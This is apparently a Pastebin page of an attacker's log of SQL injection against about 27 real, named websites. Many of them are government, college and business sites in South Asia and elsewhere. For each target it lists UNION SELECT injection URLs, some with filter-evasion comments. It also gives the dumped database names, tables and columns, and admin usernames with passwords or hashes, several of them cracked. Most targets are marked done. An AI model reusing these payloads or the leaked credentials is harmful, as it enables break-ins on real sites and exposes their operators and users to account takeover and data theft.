Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Targets :
- 1. http://ssy.org/detail.php?id=1 --> Done
- 2. http://www.ntl.gov.bd/index.php?id=37 --> Done
- 3. http://www.jisa.ac.in/gallery.php?id=%27 --> Done
- 4. http://www.emmanuelbedcollege.ac.in/gallery.php?id=5 --> Done
- 5. https://www.vgu.ac.in/photo-gallery.php?id=1 --> Done
- 6. http://www.maldacollege.ac.in/current-news.php?id=35
- 7. http://www.firesystemsa.com/news.php?id=6 -->done
- 8. http://rrgroup.com.pk/page.php?id=19
- 9. http://www.multan.gov.pk/files.php?id=1
- 10. http://rismfp.gov.np/content.php?id=326
- 11. http://www.kovaidiabetes.in/content.php?id=1 --> done
- 11. http://www.berdu.ac.bd/product_view.php?id=33 --> Done
- 12. http://sincrono.co.in/constructions/gallery-list.php?id=6
- 13. http://www.dreamskitchen.co.in/gallery.php?id=2
- 14. https://www.naipunnya.edu.in/view_gallery.php?id=32
- 15. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=12 --> DOne
- 16. http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=12 --> Done
- 17. http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=92 --> Done
- 18. http://www.baramacollege.ac.in/department.php?id=2
- 19. http://www.turnthepage.in/detail.php?bookId=147 --> Done
- 20. http://www.mrpc.co.in/users_article.php?id=3 --> Done
- 21. http://cvrce.edu.in/photo_gallery.php?id=91
- 22. http://wctmgurgaon.org/photo-gallery.php?id=36 --> Done
- 23. http://rismfp.gov.np/content.php?id=326 --> done
- 24. http://www.moha.gov.np/en/map/contact.php?district=Gulmi
- 1.http://ssy.org/detail.php?id=-1' UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13--+
- database: joshient_datassy
- user: joshient_ssyuser@localhost
- version : 5.5.55-cll
- https://pastebin.com/0czVr9pm //mero
- http://ssy.org/detail.php?id=-1' union select 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--+
- article,audios,careers,category,category_master,centre,city,contact,country,donate_item,donate_master,donations,enquiry,enroll_list,events,faqs,feedback,festivals,guruvani,image_album,item_master,item_master_old,language,level0,level1,level2,level3,level4,level5,livevideo,media,place,registerevent,schedule,schedule_old,serveitems,slider_images,state,step1,step2,step3,step4,st
- subcategory,testimonial,type,upnishad,users,video_gallery,videos,wallpaper,wishto_gift
- http://ssy.org/detail.php?id=-1' union select 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name='users'--+
- id,name,email,password,approval
- http://ssy.org/detail.php?id=-1' union select 1,2,3,password,5,6,7,8,9,10,11,12,13 from users--+
- 8881212#@$%
- http://ssy.org/detail.php?id=-1' union select 1,2,3,email,5,6,7,8,9,10,11,12,13 from users--+
- admin@ssy.org
- http://ssy.org/detail.php?id=-1' union select 1,2,3,name,5,6,7,8,9,10,11,12,13 from users--+
- admin
- http://ssy.org/detail.php?id=-1' union select 1,2,3,approval,5,6,7,8,9,10,11,12,13 from users--+
- 3
- 2.
- http://www.ntl.gov.bd
- http://www.ntl.gov.bd/index.php?id=37' order by 12 --+
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--+
- -> 3
- vulnerable column
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12--+
- ->ntlgov_xcnmuytg
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12--+
- -> ntlgov_bngferyx@localhost
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+
- -> 5.6.35
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--+
- -> banner,box,comp_name,image_gellary,left_menu,news,user
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name='user'--+
- -->id,user,pass
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,user,4,5,6,7,8,9,10,11,12 from user--+
- --> Ntl@2011%
- http://www.ntl.gov.bd/index.php?id=-37' UNION SELECT 1,2,pass,4,5,6,7,8,9,10,11,12 from user--+
- -->NtL@20#I*
- TArget 3:
- http://www.jisa.ac.in/gallery.php?id=%27 order by 10--+
- --> 10 columns
- http://www.jisa.ac.in/gallery.php?id=%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10--+
- --> column 4 is vulnerable
- http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,database(),5,6,7,8,9,10--+
- -->jisa_db
- http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,version(),5,6,7,8,9,10--+
- -->5.5.50-cll
- http://www.jisa.ac.in/gallery.php?id=%27 UNION SELECT 1,2,3,user(),5,6,7,8,9,10--+
- --> jisa_root@localhost
- http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--+
- -->gallery,gallery_more,jisa_enquiry_form,jisa_gallery,jisa_gallery_category,jisa_news_events,jisa_tbl_m_user,tbl_m_user,whats_new
- http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10 from information_schema.columns where table_name = 'jisa_tbl_m_user'--+
- --> USER_ID,STATUS,USER_NAME,USER_PASS,F_NAME,L_NAME,ADDRESS_LINE,CITY_AREA,STATE_ID,DIST_ID,BLOCK_ID,VILL_ID,EMAIL_ID,PHONE_NO,MOBILE_NO,CREATE_DATE_TIME,MODIFY_DATE_TIME,CREATED_BY,SUPPER_ADMIN
- http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,USER_PASS,5,6,7,8,9,10 from jisa_tbl_m_user--+
- -->admin!@#
- http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,USER_NAME,5,6,7,8,9,10 from jisa_tbl_m_user--+
- -->admin
- http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(group_concat(column_name))),5,6,7,8,9,10 from information_schema.columns where table_name='tbl_m_user'--+
- --> ID,USER_NAME,USER_PASS,F_NAME,L_NAME,STATUS,SHOWS
- http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(USER_NAME)),5,6,7,8,9,10 from tbl_m_user--+
- --> jisa
- http://www.jisa.ac.in/gallery.php?id=-%27 UNION SELECT 1,2,3,unhex(hex(USER_PASS)),5,6,7,8,9,10 from tbl_m_user--+
- --> 650855ed68c9d033bf0ffbcd462f2e2b
- Target 4:
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,2,3,4,5--+
- ->2
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,database(),3,4,5--+
- --> emma0812_BeDCol
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,user(),3,4,5--+
- --> emma0812_AdMi12@localhost
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,version(),3,4,5--+
- --> 5.6.35
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()--+
- --> emc_admin_login,emc_configure,emc_news_updates,emc_photo_category,emc_photo_gallery
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5 from information_schema.columns where table_name = 'emc_admin_login'--+
- --> ad_id,ad_user,ad_password,ad_status
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(ad_user)),3,4,5 from emc_admin_login--+
- --> admin
- http://www.emmanuelbedcollege.ac.in/gallery.php?id=-5' UNION SELECT 1,unhex(hex(ad_password)),3,4,5 from emc_admin_login--+
- --> admin2601
- Target 5:
- https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,2,3,4,5,6--+
- --> 2
- https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,database(),3,4,5,6--+
- --> vguac_web
- https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,user(),3,4,5,6--+
- --> vguac_webuser@localhost
- version ;5.5.55-cll
- https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6 from information_schema.tables where table_schema=database()--+
- --> admission_query,admission_query_leads,contactus,events,gallery_album,gallery_album_images,header_notification,login_user,management_lp,news_placement,online_admission,rajeshthan_board,register,tbl_user,ug_lp,ug_lp_leads
- https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6 from information_schema.columns where table_name='login_user'--+
- -> id,username,password,created
- https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(username)),3,4,5,6 from login_user--+
- -->admin
- https://www.vgu.ac.in/photo-gallery.php?id=-1'UNION SELECT 1,unhex(hex(password)),3,4,5,6 from login_user--+
- -> 5fec4ba8376f207d1ff2f0cac0882b01 --> admin!@#
- Target 6:
- http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,2,3,4 --+
- --> 2,3,4
- http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,version(),3,4 --+
- --> 5.5.45-37.4
- http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,database(),3,4 --+
- --> maldacol_maldacollege
- http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,user(),3,4 --+
- --> maldacol_test@localhost
- http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4 from information_schema.tables where table_schema=database()--+
- --> admission_notice,album,alumni_detail,archive,change_banner,deprtment_faculty,examination,faculty_assignment,faculty_event,faculty_table,
- feedback_details,image_upload,imp_links,index_banner,index_body,indexnews,internal_notice,newpages,news,non_teaching,notice_upload,pdesk,phone,photo_gallery,question_paper,
- self_study,seo,sms,student_information,sub_nav,tender_table,third_nav,top_nav,upload_results,user_annoncement,user_details,user_role
- http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4 from information_schema.columns where table_name= 'user_details'--+
- -->
- id,user_unique_id,user_full_name,user_name,user_password,status,user_role,user_email
- http://www.maldacollege.ac.in/current-news.php?id=-35 UNION SELECT 1,unhex(hex(group_concat(user_name))),3,4 from user_details--+
- --> admin , sadmin
- pass -> 3d7CypONoJmfmQ%3D%3D , 3d7CypONoJmfmQ%3D%3D
- email -> suraj.sharma@magicnines.com
- Target 7:
- http://www.firesystemsa.com/news.php?id=-6 UNION SELECT version() --+
- --> 5.6.35
- http://www.firesystemsa.com/news.php?id=-6 UNION SELECT database() --+
- --> femv_firesystemsacom
- http://www.firesystemsa.com/news.php?id=-6 UNION SELECT user() --+
- --> femv_fs2011@h2web84.infomaniak.ch
- http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema=database() --+
- --> accueil,categories_files,categories_organigramme,categories_prestations,categories_regions,contact,membres,
- membres_files,news,news_files,news_images,organigramme,prestations,prestations_files,prestations_images,references,
- references_images,regions_organigramme,regions_references
- http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(group_concat(column_name))) from information_schema.columns where table_name='membres' --+
- --> id,nom,login,pass
- http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(login)) from membres --+
- --> emilie
- http://www.firesystemsa.com/news.php?id=-6 UNION SELECT unhex(hex(pass)) from membres --+
- --> emilie
- Target 8:
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,2,3,4,5--+
- --> 5,2
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,database(),3,4,5--+
- --> rrgroupc_webportal
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,user(),3,4,5--+
- --> rrgroupc_webuser@localhost
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,version(),3,4,5--+
- --> 5.6.36-cll-lve
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()--+
- --> adminuser,category,gallery,gallerycontent,menu,news,page,project_page,settings,siteimage,siteimagetype
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646d696e75736572 --+
- --> UserID,UserName,Email,Password,IsAdmin
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(UserName)),3,4,5 from adminuser --+
- --> admin
- http://rrgroup.com.pk/page.php?id=-19 UNION SELECT 1,unhex(hex(Password)),3,4,5 from adminuser --+
- --> 7baa5cfe568230421e96c0d326bed94f --> RRG@3F3F
- Email --> fozia@3ftchnologies.com
- Target 9:
- http://www.multan.gov.pk/files.php?id=-1 /**//*!12345UNION SELECT*//**/1,2--+
- --> 2
- version: 5.5.51-38.2
- user: multango_user@localhost
- databse: multango_db
- Target 10:
- http://rismfp.gov.np/content.php?id=-326' +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- --> 4, 8
- TArget 10:
- http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,2,3,4,5,6,7--+
- -->2, 4
- http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,version(),3,4,5,6,7--+
- -->
- 5.5.51-38.2
- http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,database(),3,4,5,6,7--+
- -->mohitmin_mymin
- user() --> mohitmin_mmnin@localhost
- http://www.mohitminerals.in/news.php?id=27' /*!50000UNION+*/SELECT 1,table_name,3,4,5,6,7 from /*!information_schema*/.tables where table_schema = database()--+
- -->
- srs_business
- Target 11:
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,5,6--+
- --> 5
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,database(),6--+
- --> kovaisug_kovaidia
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,user(),6--+
- --> kovaisug_users@localhost
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,version(),6--+
- --> 5.6.34-log
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--+
- --> admin,clients,cms,configuration,facilities_details,
- facilities_title,gallery_details,gallery_title,news
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='admin'--+
- --> id,username,password
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,username,6 from admin--+
- --> pmgadmin
- http://www.kovaidiabetes.in/content.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,password,6 from admin--+
- --> 2d27ad3469fbd6a5126fbfe64268f3c6 -->083022
- Target 11:
- http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,4,5--+
- --> 1,4
- http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,version(),5--+
- --> 5.6.35-log
- http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,database(),5--+
- --> berduac_nduals
- --> user: berduac_gfrf2016@localhost
- http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema= database()--+
- --> banner,image_gellary,left_menu,news,rcategory,research,training,user
- http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name='user'--+
- --> id,user,pass
- http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,user,5 from user--+
- --> admin_ber
- http://www.berdu.ac.bd/product_view.php?id=-33' UNION SELECT 1,2,3,pass,5 from user--+
- --> ber_u200008
- Target 12;
- http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,2,3,4,5,6--+
- --> 2
- http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,version(),3,4,5,6--+
- --> 5.6.35-cll-lve
- http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,database(),3,4,5,6--+
- --> sincrono
- http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,user(),3,4,5,6--+
- --> sincornouser@localhost
- http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema= database()--+
- dotp_billingcode,dotp_common_notes,dotp_companies,dotp_config,dotp_config_list,dotp_contacts,dotp_custom_fields_lists,dotp_custom_fields_struct,dotp_custom_fields_values,dotp_departments,dotp_dotpermissions,dotp_dpversion,dotp_event_queue,dotp_events,dotp_file_folders,dotp_files,dotp_files_index,dotp_forum_messages,
- dotp_forum_visits,dotp_f
- http://sincrono.co.in/constructions/gallery-list.php?id=-6 UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name= 'dotp_dotpermissions' --+
- --> acl_id,user_id,section,axo,permission,allow,priority,enabled
- Target 13:
- http://www.dreamskitchen.co.in/gallery.php?id=2 +/*!UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11--+
- --> 3
- TArget 14:
- https://www.naipunnya.edu.in/view_gallery.php?id=-32' +/*!UNION*/+ALL+SELECT+1,2,3,4,5 --+
- -->2
- Target 15:
- http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9 --+
- --> 3, 6
- http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9 --+
- --> 5.5.42-MariaDB
- http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,database(),4,5,user(),7,8,9 --+
- --> goldenga_ggic : goldenga_user@localhost
- admin panel: http://www.goldengate.edu.np/myadmin
- taregt 16: Done
- --> goldengate_admin,goldengate_album,goldengate_banner,goldengate_category,goldengate_category_type,goldengate_content,
- goldengate_country,goldengate_download,goldengate_faculty,goldengate_grade,goldengate_level,goldengate_news,
- http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,group_concat(column_name) ,4,5,6,7,8,9 from information_schema.columns where table_name='goldengate_admin' --+
- --> admin_id,admin_fname,admin_lname,admin_name,password,date,last_login,last_ip,
- status,access,email,logo
- goldengate_photo,goldengate_result,goldengate_
- section,goldengate_settings,goldengate_shift,goldengate_student
- http://www.goldengate.edu.np/index.php?option=com_page&task=view&id=-12' +UNION+ALL+SELECT+1,2,group_concat(admin_name,': ',password) ,4,5,6,7,8,9 from goldengate_admin--+
- --> myadmin : myadmin0987
- TArget 17: done
- http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8--+
- --> 4, 6
- Database: ilovetr1_data
- Version:5.5.51-38.2
- user:ilovetr1_data@localhost
- http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,table_name,5,6,7,8 /*!from*/ /*!12345information_schema.tables*/ /*!50000where+*//*!50000table_schema*/ = database()--+
- --> admin
- http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,column_name,5,6,7,8 /*!from*/ /*!12345information_schema.columns*/ /*!50000where+*//*!50000table_name*/ = 'admin' limit 1,10--+
- --> admin_id
- http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,column_name,5,6,7,8 /*!from*/ /*!12345information_schema.columns*/ /*!50000where+*//*!50000table_name*/ = 'admin' limit 2,4--+
- --> admin_password
- http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,admin_id,5,6,7,8 /*!from*/ admin --+
- --> admin
- http://ilovetrekkingnepal.com.np/index.php?page=testimonies&id=-92' +/*!50000UNION*/+ALL+SELECT+1,2,3,admin_password,5,6,7,8 /*!from*/ admin --+
- --> 033856d3cabb789c7550fff9f0c96ec4 --> admin321iltn
- TArget 18: Firewall: Blocks IP :D
- http://www.baramacollege.ac.in/department.php?id=-2 +/*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/+1,2,3--+
- --> 2,3
- version() --> 5.5.56-cll-lve
- user() -->
- databse() -->
- Target 19: done
- http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
- --> 2,4,9
- Version() --> 10.1.25-MariaDB
- user() --> turnthep_jyotsna@localhost
- databse() --> turnthep_turnthepage
- http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema = database()--+
- --> admin,billingaddress,bookcategory,bookorder,bookorder27may,bookpickup,bookpickup27may,bookreview,
- books,contact,membershipcat,membershipplan,newsletter,notification,planexpire,purchases,shippingaddress,user
- http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name = 'admin'--+
- --> admin_id,FirstName,MiddleName,LastName,MobileNo,username,password
- http://www.turnthepage.in/detail.php?bookId=-147' +UNION+ALL+SELECT+1,group_concat( username, ' : ', password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin--+
- --> admin : TVVMVElQQVNT
- TArget 20: done
- http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,2,3,4--+
- --> 2
- database --> jadon_mrpc
- version --> 5.1.73-community
- user --> jadon_mrpc@CloudSun.serversfarm.com
- http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database()--+
- -->mrpc_admin,mrpc_content,mrpc_district,mrpc_event,mrpc_events,mrpc_feedback,mrpc_member,
- mrpc_membership,mrpc_news,mrpc_photo_gallery,mrpc_state,mrpc_user,mrpc_user_article
- http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(column_name),3,4 from information_schema.columns where table_name= 'mrpc_admin'--+
- --> id,uname,pass,email
- http://www.mrpc.co.in/users_article.php?id=-3%27 +UNION+ALL+SELECT+1,group_concat(uname, ' : ' ,pass, ' : ' ,email),3,4 from mrpc_admin--+
- --> admin : shin0bi : info.jadontech@gmail.com
- Target21: not done
- http://cvrce.edu.in/photo_gallery.php?id=91%27 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--+
- --> 1
- database() --> cvrceedu_gicvbhu'@'localhost
- TArget 22: DONE
- http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,3,4,5,6,7--+
- --> 3
- version() ;User() : database() --> 5.5.55-cll: wctmorg_cog@localhost : wctmorg_db
- http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema = database()--+
- --> alumni_registration,career,contact,gallery,getplace,getplacement,innerimages,landing_page_wctm,login,login_user,notice_board,online_enquiry,protection,question_paper,tbl_user
- http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name= 'login'--+
- --> id,pass,email,download
- --> wctm101 : wctmgurgaon@gmail.com
- http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name= 'login_user'--+
- --> id,username,password,created
- http://wctmgurgaon.org/photo-gallery.php?id=-36' +UNION+ALL+SELECT+1,2,group_concat(username,' : ', password),4,5,6,7 from login_user--+
- --> aDmiN : 5d750327786d41f330960062d3c25fd454a33c1e --> admin!@#
- target 23:
- ptpkp.gov.pk/index.php?page=news&id=1 /*!50000uNiOn+*//*!50000sElEcT+*/1,2,3,4,5,6,7--+
- --> 2,7,4
- ptpkp.gov.pk/index.php?page=news&id=1 /*!50000uNiOn+*//*!50000sElEcT+*/1,version(),3,user(),5,6,database()--+
- -->ptpkpgov_police : 5.5.51-38.2 : ptpkpgov_police@localhost
- TArget 24:
- http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- --> 4,8
- http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,table_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000tables+*/where /*!50000table_schema*/ = database limit 31,31--+
- -->usertable
- http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,column_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000columns+*/where /*!50000table_name*/ ='usertable' limit 1,5 --+
- --> usern
- http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,column_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000columns+*/where /*!50000table_name*/ ='usertable' limit 2,5 --+
- --> userp
- http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,userp*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from*/ usertable--+
- -->user : [m@[%}*Fk(ti
- --> pass: admin@123
- TArget 25:
- http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 --+
- --> 2,4,5,6,7,8,9
- http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(database(),0x3c62723e ,user(),0x3c62723e,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 --+
- -->
- DB383432
- U383432@klute.store.d0m.de
- 5.6.36-log
- http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(table_name,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.tables where table_schema = database()--+
- --> ausstellungen,bilder,collaborations,detail,filme,foerderungen,installationen,movies,movies_ausstellungen,movies_installations,participations,preise,serendipity_access,serendipity_authorgroups,serendipity_authors,serendipity_category,serendipity_comments,serendipity_config,
- serendipity_entries,serendipity_entrycat,serendipity_entryproperties,serendipity_exits,serendipity_groupconfig,serendipity_groups,serendipity_images,serendipity_mediaproperties,serendipity_options,serendipity_permalinks,serendipity_plugincategories,serendipity_pluginlist,
- serendipity_plugins,serendipity_references,serendipity_referrers,serendipity_refs,serendipity_spamblock_htaccess,serendipity_spamblocklog,serendipity_suppress,serendipity_visitors,serendipity_visitors_count,starters,users,verleihe,vita
- http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.columns where table_name= 'users'--+
- --> ID,user,pass
- http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(user,0x3c62723e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users--+
- --> meggie
- 34857ee0ffba0f1a0f63b09ae823f891
- Target 26:
- http://www.tacc.co.il/story.php?id=-9 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8--+
- -->2,5
- http://www.tacc.co.il/story.php?id=-9 +/*!50000UNION*/+ALL+SELECT+1,database(),3,4,5,6,7,8--+
- --> oferdr_taccnew
- user --> oferdr_root@localhost
- version --> 5.5.51-38.2
- http://www.tacc.co.il/story.php?id=-9++/*!50000UNION*/+ALL+SELECT+1,/*!12345group_ConcAt(table_name,0x3c62723e)*/,3,4,5,6,7,8 /*!50000from+*/information_schema.tables where table_schema = database()--+
- -->ads
- ,articles
- ,categories
- ,galleries
- ,homepage
- ,interviews
- ,links
- ,logos
- ,pictures
- ,press
- ,products
- ,sismaot
- ,sub_top_menu
- ,team
- ,team_categories
- ,top_menu
- ,videos
- http://www.tacc.co.il/story.php?id=-9++/*!50000UNION*/+ALL+SELECT+1,/*!12345group_ConcAt(user,0x3c62723e,pass)*/,3,4,5,6,7,8 /*!50000from+*/sismaot --+
- -->dfjdf67utr0ds7urt
- --> kjkjk87sdsdk878
- Target 27:
